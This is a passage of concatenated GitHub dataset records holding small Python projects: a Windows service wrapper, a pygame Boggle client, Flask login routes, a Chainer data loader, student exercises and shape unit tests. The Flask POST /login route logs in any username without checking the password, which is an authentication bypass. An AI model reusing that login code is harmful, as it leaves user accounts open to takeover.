signal\n\nlogger = logging.getLogger('service')\ndebug = logger.debug\n\nimport subprocess\n\nclass TestService(win32serviceutil.ServiceFramework):\n _svc_name_ = \"TestService\"\n _svc_display_name_ = \"Test Service\"\n\n def __init__(self, args):\n win32serviceutil.ServiceFramework.__init__(self, args)\n self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)\n socket.setdefaulttimeout(60)\n import server\n self.startstop = server.premain(daemon=True)\n\n def SvcStop(self):\n self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n win32event.SetEvent(self.hWaitStop)\n\n def SvcDoRun(self):\n start,stop,wait,kill = self.startstop\n start()\n rc = None\n while rc != win32event.WAIT_OBJECT_0:\n rc = win32event.WaitForSingleObject(self.hWaitStop, 5000)\n stop()\n wait()\n\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n servicemanager.Initialize()\n servicemanager.PrepareToHostSingle(TestService)\n servicemanager.StartServiceCtrlDispatcher()\n else:\n win32serviceutil.HandleCommandLine(TestService)\n","repo_name":"alex-eri/spot4","sub_path":"server/WindowsService.py","file_name":"WindowsService.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"8892810422","text":"#!/usr/bin/python\nimport time\n\n\ndef create_list_with_append():\n fin = open('words.txt')\n list_of_words = []\n\n for line in fin:\n word = line.strip()\n list_of_words.append(word)\n\n return list_of_words\n\ndef create_list_with_idiom():\n fin = open('words.txt')\n line = fin.readline()\n t = []\n\n for line in fin:\n word = line.strip()\n t += [word]\n\n return t\n\nstart = time.time()\ncreate_list_with_append()\nend = time.time()\nprint(\"The time of execution of above program is :\", end - start)\n\n\nstart = time.time()\ncreate_list_with_idiom()\nend = time.time()\nprint(\"The time of execution of above program is :\", end - start)","repo_name":"norbiax/Think-Python-excercises","sub_path":"wordlist.py","file_name":"wordlist.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36490335488","text":"import pygame, sys, time\nfrom pygame.locals import *\nfrom client import Client\nimport gamestate\nfrom customlib import *\n\npygame.init()\n\nclient = Client(input(\"Server IPv4 Address: \"))\n\n# -- OPTIONS --\n\n# Legend:\n# - Window: the whole screen\n# - Round rects: the three decorative round rect borders\n# - Squares: the small squares containing the nine letters\n# - Panel: the large square containing the nine small squares\n# - Message: the thin display below the panel\n# - Enterbox: the dark display below the message\n# - Hourglass: the timer in the center\n# - Scorecards: the rectangles containing player scores\n# - Title: the label above the scorecards\n\n# Dimensions\n\nwindowSize = (1300, 800)\nwindowBevel = 10\n\ndisplaySurface = pygame.display.set_mode(windowSize)\n\nroundRectRects = [(50, 50, 500, 700), (580, 50, 140, 700), (750, 50, 500, 700)]\nroundRectRadius = 8\n\nsquareTLRect = (105, 105, 110, 110)\nsquareSpacing = 140\nsquareTextHeight = 6\nsquareShadowHeight = 10\nsquareRects = [(squareTLRect[0] + squareSpacing * (i%3), squareTLRect[1] + squareSpacing * int(i/3)) + squareTLRect[2:4] for i in range(9)]\n\npanelRect = (75, 75, 450, 450)\n\nmessageRect = (75, 550, 450, 50)\n\nenterboxRect = (75, 625, 450, 100)\nenterboxBorder = 5\n\nhourglassRect = (605, 75, 90, 650)\nhourglassBorder1 = 
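Note on the wordlist.py record above: create_list_with_idiom calls fin.readline() before its loop, so it silently drops the first word and the two builders do not produce the same list, making the timing comparison slightly apples-to-oranges (the intended contrast is append vs t += [word]). A sketch of the fixed variant, plus a fairer repeated measurement with timeit:

# Fixed variant: no stray readline, so both builders see every word.
def create_list_with_idiom():
    t = []
    with open("words.txt") as fin:
        for line in fin:
            t += [line.strip()]
    return t

import timeit
print(timeit.timeit(create_list_with_append, number=5))
print(timeit.timeit(create_list_with_idiom, number=5))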
5\nhourglassBorder2 = 5\n\nscorecardTRect = (775, 200, 450, 75)\nscorecardSpacing = 85\nscorecardBorder = 5\nscorecardTextMarginLeft = 15\nscorecardTextMarginRight = 15\n\ntitleRect = (775, 75, 450, 100)\ntitleTextHeight = 6\n\n# Colors\n\nwindowColor = \"#8766cc\"\nwindowColorLight = \"#a58cd9\"\nwindowColorDark = \"#693fc0\"\n\nroundRectColor = (110, 77, 178)\n\nsquareOffColor = \"#a3b3c2\"\nsquareOnColor = \"#4747eb\"\nsquareShadowOffColor = \"#6c8193\"\nsquareShadowOnColor = \"#3333cc\"\nsquareTextOffColor = \"#141f1f\"\nsquareTextOnColor = \"#deeded\"\nsquareTextShadowOffColor = \"#677e7e\"\nsquareTextShadowOnColor = \"#8fa3a3\"\n\npanelColor = \"#342673\"\n\nmessageColor = \"#563894\"\nmessageTextStartColor = \"#33eeff\"\nmessageTextUniqueColor = \"#33ff44\"\nmessageTextTakenColor = \"#ffcc33\"\nmessageTextInvalidColor = \"#ff4433\"\n\nenterboxColor = \"#23194d\"\nenterboxBorderColor = \"#342673\"\nenterboxTextColor = \"#e9fbfb\"\n\nhourglassBorder1Color = \"#563894\"\nhourglassBorder2Color = \"#342673\"\n\nscorecardColor = \"#23194d\"\nscorecardBorderNormalColor = \"#342673\"\nscorecardBorderTopColor = \"#cde052\"\nscorecardTextNameNormalColor = \"#7466cc\"\nscorecardTextNameSelfColor = \"#3df599\"\nscorecardTextScoreColor = \"#e8e87d\"\n\ntitleColor = \"#4c3181\"\ntitleTextUpperColor = \"#f4f4f1\"\ntitleTextLowerColor = \"#bcbca9\"\n\n# Fonts\n\nsquareFont = loadFont(\"RosaSans-Black.ttf\", 100)\nmessageFont = loadFont(\"RosaSans-SemiBold.ttf\", 33)\nenterboxFont = loadFont(\"RosaSans-Bold.ttf\", 66)\nscorecardNameFont = loadFont(\"RosaSans-SemiBold.ttf\", 50)\nscorecardScoreFont = loadFont(\"RosaSans-Bold.ttf\", 58)\ntitleFont = loadFont(\"RosaSans-SemiBold.ttf\", 66)\n\nhourglassImage = loadImage(\"hourglass.png\")\n\n# Surfaces\n\nbackgroundSurface = pygame.Surface(windowSize, SRCALPHA).convert_alpha()\npygame.draw.polygon(backgroundSurface, windowColorLight, ((0, 0), (windowSize[0], 0), (windowSize[0] - windowBevel, windowBevel), (windowBevel, windowBevel), (windowBevel, windowSize[1] - windowBevel), (0, windowSize[1])))\npygame.draw.polygon(backgroundSurface, windowColorDark, ((windowSize[0], windowSize[1]), (0, windowSize[1]), (windowBevel, windowSize[1] - windowBevel), (windowSize[0] - windowBevel, windowSize[1] - windowBevel), (windowSize[0] - windowBevel, windowBevel), (windowSize[0], 0)))\npygame.draw.rect(backgroundSurface, windowColor, (windowBevel, windowBevel, windowSize[0] - windowBevel * 2, windowSize[1] - windowBevel * 2))\nfor rect in roundRectRects:\n drawRoundRectTopLeft(backgroundSurface, rect[0:2], rect[2:4], roundRectRadius, roundRectColor)\npygame.draw.rect(backgroundSurface, panelColor, panelRect)\npygame.draw.rect(backgroundSurface, messageColor, messageRect)\npygame.draw.rect(backgroundSurface, enterboxBorderColor, enterboxRect)\ndrawShrunkenRect(backgroundSurface, enterboxColor, enterboxRect, enterboxBorder)\npygame.draw.rect(backgroundSurface, hourglassBorder1Color, hourglassRect)\ndrawShrunkenRect(backgroundSurface, hourglassBorder2Color, hourglassRect, hourglassBorder1)\npygame.draw.rect(backgroundSurface, titleColor, titleRect)\nblitRectCenter(backgroundSurface, titleFont.render(\"Boggle!\", True, titleTextLowerColor), titleRect, (0, titleTextHeight / 2))\nblitRectCenter(backgroundSurface, titleFont.render(\"Boggle!\", True, titleTextUpperColor), titleRect, (0, titleTextHeight / -2))\n\n# Input\n\nadjacentIndices = {0:(1,3,4), 1:(0,2,3,4,5), 2:(1,4,5), 3:(0,1,4,6,7), 4:(0,1,2,3,5,6,7,8), 5:(1,2,4,7,8), 6:(3,4,7), 7:(3,4,5,6,8), 8:(4,5,7)}\n\nclass 
App:\n def __init__(self):\n self.client = client\n self.client.app = self\n\n self.clock = pygame.time.Clock()\n self.refreshRate = 60\n self.previousClockTime = time.perf_counter()\n\n self.displaySurface = displaySurface\n pygame.display.set_caption(\"Boggle!\")\n\n self.squareSurfaces = [pygame.Surface(squareTLRect[2:4], SRCALPHA).convert_alpha() for i in range(9)]\n self.messageSurface = pygame.Surface(messageRect[2:4], SRCALPHA).convert_alpha()\n self.enterboxSurface = pygame.Surface(enterboxRect[2:4], SRCALPHA).convert_alpha()\n self.hourglassSurface = pygame.Surface(hourglassImage.get_size(), SRCALPHA).convert_alpha()\n self.scorecardSurfaces = []\n\n self.updateMessageSurface(\"start\", ready = False)\n\n self.inputIndices = []\n self.inputWord = \"\"\n\n self.loop()\n\n def loop(self):\n while True:\n keys = pygame.key.get_pressed()\n\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == KEYDOWN:\n if self.client.state.phase == \"idle\":\n if event.key == K_SPACE: # Space\n self.updateMessageSurface(\"start\", ready = True)\n self.client.sendReady()\n elif self.client.state.phase == \"play\":\n if event.unicode.isalpha(): # Letter\n self.addLetter(event.unicode.upper())\n elif event.key == K_BACKSPACE: # Backspace\n self.removeLetter()\n elif event.key == K_RETURN: # Return\n self.submitWord()\n\n self.displaySurface.blit(backgroundSurface, (0, 0))\n\n self.updateSquareSurfaces()\n for i in range(9): self.displaySurface.blit(self.squareSurfaces[i], squareRects[i][0:2])\n\n self.displaySurface.blit(self.messageSurface, messageRect)\n self.displaySurface.blit(self.enterboxSurface, enterboxRect)\n\n self.updateHourglassSurface()\n if self.client.state.phase == \"play\":\n self.displaySurface.blit(self.hourglassSurface, addVector(hourglassRect[0:2], unitVector(2, hourglassBorder1 + hourglassBorder2)))\n\n self.updateScorecardSurfaces()\n for i in range(len(self.scorecardSurfaces)): self.displaySurface.blit(self.scorecardSurfaces[i], addVector(scorecardTRect[0:2], (0, i * scorecardSpacing)))\n\n pygame.display.update()\n self.clock.tick(self.refreshRate)\n \n def addLetter(self, key):\n # if self.inputIndices == [] or (index in adjacentIndices[self.inputIndices[-1]] and index not in self.inputIndices):\n # self.inputIndices.append(index)\n # self.inputWord += self.client.state.letters[int(index/3)][index%3]\n # self.updateEnterboxSurface()\n if len(self.inputWord) < 9: self.inputWord += key\n self.updateEnterboxSurface()\n\n def removeLetter(self):\n # if self.inputIndices != []:\n # self.inputIndices = self.inputIndices[:-1]\n # self.inputWord = self.inputWord[:-1]\n # self.updateEnterboxSurface()\n if self.inputWord != \"\": self.inputWord = self.inputWord[:-1]\n self.updateEnterboxSurface()\n\n def submitWord(self):\n # if len(self.inputIndices) >= 3:\n # self.client.sendWord(self.inputWord.lower())\n # self.inputIndices = []\n # self.inputWord = \"\"\n # self.updateEnterboxSurface()\n if len(self.inputWord) >= 3:\n self.client.sendWord(self.inputWord.lower())\n self.inputWord = \"\"\n self.updateEnterboxSurface()\n\n def updateSquareSurfaces(self):\n self.squareSurfaces = []\n for i in range(9):\n surface = pygame.Surface(squareTLRect[2:4], SRCALPHA).convert_alpha()\n\n if self.client.state.phase == \"idle\" or self.client.state.phase == \"countdown\":\n surface.fill(squareOffColor)\n pygame.draw.rect(surface, squareShadowOffColor, (0, 0, squareTLRect[2], squareShadowHeight))\n elif self.client.state.phase == \"play\" or 
self.client.state.phase == \"results\":\n letter = self.client.state.letters[int(i/3)][i%3]\n if i in self.inputIndices:\n bgColor = squareOnColor\n shadowColor = squareShadowOnColor\n textTopColor = squareTextOnColor\n textBotColor = squareTextShadowOnColor\n else:\n bgColor = squareOffColor\n shadowColor = squareShadowOffColor\n textTopColor = squareTextOffColor\n textBotColor = squareTextShadowOffColor\n surface.fill(bgColor)\n pygame.draw.rect(surface, shadowColor, (0, 0, squareTLRect[2], squareShadowHeight))\n blitSurfaceCenter(surface, squareFont.render(letter, True, textBotColor), (0, squareTextHeight / 2))\n blitSurfaceCenter(surface, squareFont.render(letter, True, textTopColor), (0, squareTextHeight / -2))\n \n self.squareSurfaces.append(surface)\n\n def updateMessageSurface(self, messageType, ready = False, word = \"n/a\"):\n if messageType == \"start\":\n color = messageTextStartColor\n if ready:\n text = \"Waiting for other players...\"\n else:\n text = \"Press Space to start\"\n elif messageType == \"unique\":\n color = messageTextUniqueColor\n text = word.upper() + \": +\" + str(gamestate.wordScores[len(word)])\n elif messageType == \"taken\":\n color = messageTextTakenColor\n text = word.upper() + \" has been played!\"\n elif messageType == \"invalid\":\n color = messageTextInvalidColor\n text = word.upper() + \" is an invalid word!\"\n\n self.messageSurface.fill((0,0,0,0))\n blitSurfaceCenter(self.messageSurface, messageFont.render(text, True, color))\n\n def updateEnterboxSurface(self):\n self.enterboxSurface.fill((0,0,0,0))\n blitSurfaceCenter(self.enterboxSurface, enterboxFont.render(self.inputWord, True, enterboxTextColor))\n\n def updateHourglassSurface(self):\n self.hourglassSurface.fill((0,0,0,0))\n y = (hourglassRect[3] - 2 * (hourglassBorder1 + hourglassBorder2)) * (1 - self.client.state.timer / gamestate.playTime)\n self.hourglassSurface.blit(hourglassImage, (0, round(y)))\n\n def updateScorecardSurfaces(self):\n self.scorecardSurfaces = []\n data = [(player.username, player.score) for player in self.client.state.players.values()]\n data.sort(key = lambda x : x[1], reverse = True)\n\n for i in range(len(data)):\n surface = pygame.Surface(scorecardTRect[2:4], SRCALPHA).convert_alpha()\n\n if (i == 0): surface.fill(scorecardBorderTopColor)\n else: surface.fill(scorecardBorderNormalColor)\n drawShrunkenRect(surface, scorecardColor, (0, 0) + scorecardTRect[2:4], scorecardBorder)\n\n if (data[i][0] == self.client.username): blitSurfaceCenterX(surface, scorecardNameFont.render(data[i][0], True, scorecardTextNameSelfColor), scorecardTextMarginLeft)\n else: blitSurfaceCenterX(surface, scorecardNameFont.render(data[i][0], True, scorecardTextNameNormalColor), scorecardTextMarginLeft + scorecardBorder)\n scoreText = scorecardScoreFont.render(str(data[i][1]), True, scorecardTextScoreColor)\n blitSurfaceCenterX(surface, scoreText, scorecardTRect[2] - scoreText.get_width() - scorecardTextMarginRight - scorecardBorder)\n\n self.scorecardSurfaces.append(surface)\n\napp = App()","repo_name":"Aledax/BoggleBlitz","sub_path":"scripts/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5650453798","text":"\nimport collaborative_journal as cj\n\nfrom flask import request, session, redirect, url_for, render_template, jsonify\nfrom flask_login import current_user, login_user, logout_user\nimport json\nfrom flask_wtf import csrf\n\nfrom 
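Note on the Boggle app.py record above: the board-adjacency input path is commented out in favor of raw keyboard entry, but the adjacentIndices table still encodes which of the nine squares touch. An illustrative sketch (names are mine, not the project's) of how that table could validate that a typed word is traceable on the 3x3 board via a DFS over non-repeating adjacent squares:

# Illustrative: check a typed word against the 3x3 board using adjacentIndices.
def word_on_board(word, letters, adjacent=adjacentIndices):
    flat = [letters[i // 3][i % 3] for i in range(9)]

    def dfs(pos, used, depth):
        if depth == len(word):
            return True
        for nxt in adjacent[pos]:
            if nxt not in used and flat[nxt] == word[depth]:
                if dfs(nxt, used | {nxt}, depth + 1):
                    return True
        return False

    return any(flat[i] == word[0] and dfs(i, {i}, 1) for i in range(9))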
collaborative_journal.model.login import RegisterForm, LoginForm\nfrom collaborative_journal.model.user import User\nfrom collaborative_journal.model import db\nfrom collaborative_journal import load_user\n# from django.views.decorators.csrf import ensure_csrf_cookie\n\n\n\n# @ensure_csrf_cookie\n# @cj.app.route('/login/request', methods=['POST'])\n# def login_request():\n#     print(\"\\nPOST LOGIN REQUEST\\n\")\n#     data = json.loads(request.data)\n\n#     print(data)\n#     user = User.query.filter_by(username=data['username']).first()\n#     login_user(user, remember=True)\n#     return jsonify(**{'is_authenticated': True})\n\n\n\n\n\n# @cj.app.route('/token', methods=['GET'])\n# def token():\n\n#     token = csrf.generate_csrf()\n#     return jsonify(**{'token': token})\n\n\n\n@cj.app.route('/login', methods=['POST', 'GET'])\ndef login():\n    print(request.data)\n    if request.method == 'GET':\n        print(\"\\nGET REQUEST\\n\")\n        # context = {'token': csrf.generate_csrf()}\n        context={}\n        if current_user.is_authenticated:\n            context['is_authenticated']= True\n        else:\n            context['is_authenticated']= False\n        return render_template('index_dynamic.html', **context)\n    \n    if request.method == 'POST':\n        data = json.loads(request.data)\n        print(request)\n        print(data)\n        user = User.query.filter_by(username=data['username']).first()\n        login_user(user, remember=True)\n        print(\"logging in user: \", user.username)\n        print(\"with id: \", user.id)\n        return jsonify(**{'is_authenticated': True})\n\n\n    # user = User.query.filter_by(username=form.username.data).first()\n    # if user is None or not user.check_password(form.password.data):\n    #     print(form.data)\n    #     return jsonify(**{'is_authenticated': False})\n    # login_user(user, remember=True)\n    # return jsonify(**{'is_authenticated': True})\n    \n\n\n@cj.app.route('/logout', methods=['GET', 'POST'])\ndef logout():\n    logout_user()\n    # return redirect(url_for('login'))\n    token = csrf.generate_csrf()\n    return jsonify(**{'is_authenticated': False, 'token': token})\n\n\n\n\n@cj.app.route('/register', methods=['POST'])\ndef register():\n    if request.method == 'GET':\n        return jsonify(**{})\n\n\n    elif request.method == 'POST':\n        data = json.loads(request.data)\n        user = User(username=data['username'])\n        print(user)\n        user.set_password(data['password'])\n        db.session.add(user)\n        db.session.commit()\n        login_user(user, remember=True)\n\n        return jsonify(**{'successful_register': True})\n\n\n    # if current_user.is_authenticated:\n    #     return redirect(url_for('index'))\n    # form = RegisterForm()\n    # if form.validate_on_submit():\n    #     user = User(username=form.username.data)\n    #     user.set_password(form.password.data)\n    #     db.session.add(user)\n    #     db.session.commit()\n    #     # flash('Congratulations, you are now a registered user!')\n    #     return redirect(url_for('login'))\n    #     return render_template('register.html', title='Register', form=form)\n\n\n\n\n\n\n","repo_name":"scshafe/cj","sub_path":"collaborative_journal/api/authentication/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"19395463496","text":"import progressbar\nimport six\nimport datetime\n\nimport numpy as np\nimport chainer.functions as F\nfrom chainer.backends import cuda\nimport re\n\nclass LoadData:\n\n    UNK = 0\n    EOS = 1\n    PAD = -1\n    # min and max sequence lengths\n    minlen = 1\n    maxlen = 50\n    vocabulary = {}\n    peVocabulary = {}\n    ids_words = {}\n\n    @classmethod\n    def word_ids(cls, voPath):\n        # word_ids: map each word to an integer id\n        # dict {word: id}: look up a word to get its id\n
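        # the vocabulary file is expected to hold one word per line\n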
with open(voPath) as f:\n            # +2 for UNK and EOS\n            # line.strip removes the trailing newline and surrounding whitespace\n            vocabulary = {line.strip(): i + 2 for i, line in enumerate(f)}\n            vocabulary['<UNK>'] = 0\n            vocabulary['<EOS>'] = 1\n            vocabulary['<PAD>'] = -1 # needed?\n        return vocabulary\n\n\n    @classmethod\n    def ids_word(cls, vocabulary):\n        # map ids back to words\n        # dict {id: word}: look up an id to get its word\n        ids_words = {i: w for w, i in vocabulary.items()}\n        return ids_words\n\n\n    @classmethod\n    def load_data(cls, path):\n        n_lines = cls.count_lines(path)\n        bar = progressbar.ProgressBar()\n        wordData = []\n        #humanData = []\n        count = 0\n        print('loading...: %s' % path)\n        with open(path) as f:\n            for line in bar(f, max_value=n_lines):\n                parson = re.match(r'[^(:|\\n)]*:', line) # speaker name before the ':' (what if the name is two or more words?)\n                line = re.sub(r'[^(:|\\n)]*:', \"\", line)\n                if parson != None:\n                    parson = parson.group(0)[:-1].strip()\n                else:\n                    count += 1\n                    parson = \"none\"\n                words = line.strip().split()\n                # use numpy arrays here, otherwise memory usage explodes\n                wordArray = np.array([cls.vocabulary.get(w, cls.UNK) for w in words], dtype=np.int32)\n                parson = np.array(cls.peVocabulary.get(parson, cls.UNK), dtype=np.int32)\n                wordData.append((parson, wordArray))\n        print(count)\n        return wordData\n\n    @classmethod\n    def count_lines(cls, path):\n        # count the lines in the file\n        with open(path) as f:\n            return sum([1 for _ in f])\n\n    @classmethod\n    def sequence_embed(cls, embed, xs):\n        # per-sentence lengths; len(xs) is the batch size\n        if len(np.shape(xs)) != 1:\n            x_len = [len(x) for x in xs]\n            # cumsum returns the running totals along the given axis\n            # x_len[:-1] is the list without its last element\n            x_section = np.cumsum(x_len[:-1])\n            # xs is a tuple of Variable / numpy.ndarray / cupy.ndarray\n            # concat joins the arrays; axis=0 stacks them vertically (more rows)\n            ex = embed(F.concat(xs, axis=0))\n            # split_axis returns a tuple, restoring the original per-sentence arrays\n            exs = F.split_axis(ex, x_section, 0)\n        else:\n            exs = embed(xs)\n        return exs\n\n    @classmethod\n    def makeVocab(cls, voPath, peVoPath):\n        cls.vocabulary = cls.word_ids(voPath)\n        cls.peVocabulary = cls.word_ids(peVoPath)\n        cls.ids_words = cls.ids_word(cls.vocabulary)\n\n    @classmethod\n    def makeData(cls, inPath, outPath, voPath, peVoPath):\n        #return [(source wordID0, target wordID0),(),()], {word:ID,..} - do we also need the split version?\n        #[np.array0, np.array1,...] 
of ids\n        #inData[(parson, wordArray), (), ()]\n        inData = cls.load_data(inPath)\n        outData = cls.load_data(outPath)\n        assert len(inData) == len(outData) # a bit strict\n        train_data = [ # build the training pairs\n            ((s[0], np.append(s[1], cls.EOS)), (t[0], np.append(t[1], cls.EOS)))\n            for s, t in six.moves.zip(inData, outData)\n            if (cls.minlen <= len(s[1])+1 <= cls.maxlen\n                and\n                cls.minlen <= len(t[1])+1 <= cls.maxlen)\n        ]\n        # extra diagnostics\n        print('[{}] Dataset loaded.'.format(datetime.datetime.now()))\n        train_source_unknown = cls.calculate_unknown_ratio(\n            [s[1] for s, _ in train_data])\n        train_target_unknown = cls.calculate_unknown_ratio(\n            [t[1] for _, t in train_data])\n\n        print('vocabulary size: %d' % len(cls.vocabulary))\n        print('persona vocabulary size %d' % len(cls.peVocabulary))\n        print('Train data size: %d' % len(train_data))\n        print('source unknown ratio: %.2f%%' % (\n            train_source_unknown * 100))\n        print('target unknown ratio: %.2f%%' % (\n            train_target_unknown * 100))\n\n        #train_data[((inparson, inArray),(outparson, outArray)), ((inparson, inArray),(outparson, outArray))]\n        return (train_data, inData, outData)\n\n    @classmethod\n    def calculate_unknown_ratio(cls, data):\n        unknown = sum((s == cls.UNK).sum() for s in data)\n        total = sum(s.size for s in data)\n        return unknown / total\n\n\n","repo_name":"IshikuraGaku/persona2","sub_path":"loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":4993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"40161200860","text":"\"\"\"\nobsahuje.py\n\nreads a string containing letters and digits\nwalks the string and sorts its characters into groups: letters, digits, other characters\nprints how many characters each group contains\n\nthen reads one more character; if it does not occur in the string, it is appended\nto the end of the string and the whole string is printed to the screen\n\n\"\"\"\npocet_pismen = 0\npocet_cisel = 0\npocet_jine = 0\n\nretezec = str(input(\"enter any string: \"))\n\ndelka = len(retezec)\n\nprint()\nprint(f\"Number of characters in the string: {delka}\")\n\nfor i in range(0, delka):\n    if retezec[i].isalpha():\n        pocet_pismen = pocet_pismen + 1\n    else:\n        if retezec[i].isdigit():\n            pocet_cisel = pocet_cisel + 1\n        else:\n            pocet_jine = pocet_jine + 1\n\nprint(\"The string contains:\")\nprint(f\"Letters: {pocet_pismen:>}\")\nprint(f\"Digits: {pocet_cisel:>}\")\nprint(f\"Other characters: {pocet_jine:>}\")\n\ndalsi_znak = str(input(\"Enter one more character: \"))\n\n#if retezec.find(dalsi_znak)== -1: # one way\nif dalsi_znak not in retezec: # another possible way\n    retezec = retezec + dalsi_znak\n    print(f\"The character was appended to the end of the string. 
The new string is \"{retezec}\".\")\nelse:\n    print(f\"The character already occurs in the string \\"{retezec}\\".\")\n","repo_name":"krikavap/python-kurz","sub_path":"obsahuje.py","file_name":"obsahuje.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"44598377377","text":"import pandas as pd\nfrom collections import Counter\nimport re\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndata = pd.read_csv('reinvers_explain.csv')\ncol = list(data.columns.values)\nfeatures = {}\nfe = {}\nfor s in col:\n    c = re.sub(r\"[<>=0-9.\\s+]\", \"\", s)\n    if c in features:\n        features[c] = data[s].dropna().shape[0]+features[c]\n    else:\n        features[c] = data[s].dropna().shape[0]\n    fe[s] = data[s].dropna().shape[0]\nf_df = pd.DataFrame.from_dict(features.items())\nf_df.to_csv('a.csv', index=False)\n# sort by value count\nfe = {k: v for k, v in sorted(fe.items(), key=lambda item: item[1], reverse=True)}\ndata = data[list(fe.keys())]\nplt.figure(figsize=(10, 12))\nax = sns.heatmap(data.T, yticklabels=True)\nplt.show()\n\nprint('done')","repo_name":"chingheng113/twStrokeML","sub_path":"right_wrong_model_building/explain_features.py","file_name":"explain_features.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"42229757146","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 17 13:25:04 2021\n\n@author: afe02\n\"\"\"\nimport unittest\nimport shapes_begin as shapes\nimport math\n\n\n\nclass TestCircle(unittest.TestCase):\n    def setUp(self):\n        self._circle1 = shapes.Circle(\"c1\", \"red\", 1)\n        self._circle2 = shapes.Circle(\"c2\", \"blue\", 2)\n    def testNameColor(self):\n        self.assertEqual(self._circle1.name(), \"c1\")\n        self.assertEqual(self._circle2.name(), \"c2\")\n        self.assertEqual(self._circle1.color(), \"red\")\n        self.assertEqual(self._circle2.color(), \"blue\")\n    def testArea(self):\n        area1 = math.pi\n        area2 = 4 * math.pi\n        self.assertAlmostEqual(self._circle1.area(), area1)\n        self.assertAlmostEqual(self._circle2.area(), area2)\n    def testCircumference(self):\n        circ1 = 2* math.pi\n        circ2 = 4 * math.pi\n        self.assertAlmostEqual(self._circle1.circumference(), circ1)\n        self.assertAlmostEqual(self._circle2.circumference(), circ2)\n    \n    \nclass TestTriangle(unittest.TestCase):\n    def setUp(self):\n        self._triangleAcuteAngle1 = shapes.Triangle(\"taa1\", \"red\", 2, 2, 60)\n        self._triangleAcuteAngle2 = shapes.Triangle(\"taa2\", \"black\", math.sqrt(3), 2, 30)\n        self._triangleAcuteAngle3 = shapes.Triangle(\"taa3\", \"red\", 1, math.sqrt(2), 45)\n        self._triangleObtuseAngle1 = shapes.Triangle(\"toa1\", \"red\", 1, 2, 120) \n    def testNameColor(self):\n        self.assertEqual(self._triangleAcuteAngle1.name(), \"taa1\")\n        self.assertEqual(self._triangleAcuteAngle2.name(), \"taa2\")\n        self.assertEqual(self._triangleAcuteAngle1.color(), \"red\")\n        self.assertEqual(self._triangleAcuteAngle2.color(), \"black\")\n    def testArea(self):\n        areaAA1 = math.sqrt(3)\n        areaAA2 = areaAA1/2\n        areaAA3 = 0.5\n        areaOA1 = areaAA2\n        self.assertAlmostEqual(self._triangleAcuteAngle1.area(), areaAA1)\n        self.assertAlmostEqual(self._triangleAcuteAngle2.area(), areaAA2)\n        self.assertAlmostEqual(self._triangleAcuteAngle3.area(), areaAA3)\n        self.assertAlmostEqual(self._triangleObtuseAngle1.area(), areaOA1)\n    def testCircumference(self):\n        circAA1 = 6\n        circAA2 = 3 + math.sqrt(3)\n        circAA3 = 2 + math.sqrt(2)\n        circOA1 = 3 + math.sqrt(7)\n
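        # the obtuse triangle's third side follows from the law of cosines: c = sqrt(a**2 + b**2 - 2*a*b*cos(C)) = sqrt(1 + 4 - 2*1*2*cos(120)) = sqrt(7)\n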
self.assertAlmostEqual(self._triangleAcuteAngle1.circumference(), circAA1)\n        self.assertAlmostEqual(self._triangleAcuteAngle2.circumference(), circAA2)\n        self.assertAlmostEqual(self._triangleAcuteAngle3.circumference(), circAA3)\n        self.assertAlmostEqual(self._triangleObtuseAngle1.circumference(), circOA1)\n    \nclass TestRectangle(unittest.TestCase):\n    def setUp(self):\n        self._rect1 = shapes.Rectangle(\"r1\", \"red\", 2, 4)\n        self._rect2 = shapes.Rectangle(\"r2\", \"white\", 3.5, 2)\n    def testNameColor(self):\n        self.assertEqual(self._rect1.name(), \"r1\")\n        self.assertEqual(self._rect2.name(), \"r2\")\n        self.assertEqual(self._rect1.color(), \"red\")\n        self.assertEqual(self._rect2.color(), \"white\")\n    def testArea(self):\n        area1 = 8\n        area2 = 7\n        self.assertAlmostEqual(self._rect1.area(), area1)\n        self.assertAlmostEqual(self._rect2.area(), area2)\n    def testCircumference(self):\n        circ1 = 12\n        circ2 = 11\n        self.assertAlmostEqual(self._rect1.circumference(), circ1)\n        self.assertAlmostEqual(self._rect2.circumference(), circ2)\n    \n    \nif __name__ == '__main__':\n    unittest.main()\n    ","repo_name":"FarsanBaloo/DVA245","sub_path":"Assignments/1-OOP-IterGen/shapes_test.py","file_name":"shapes_test.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
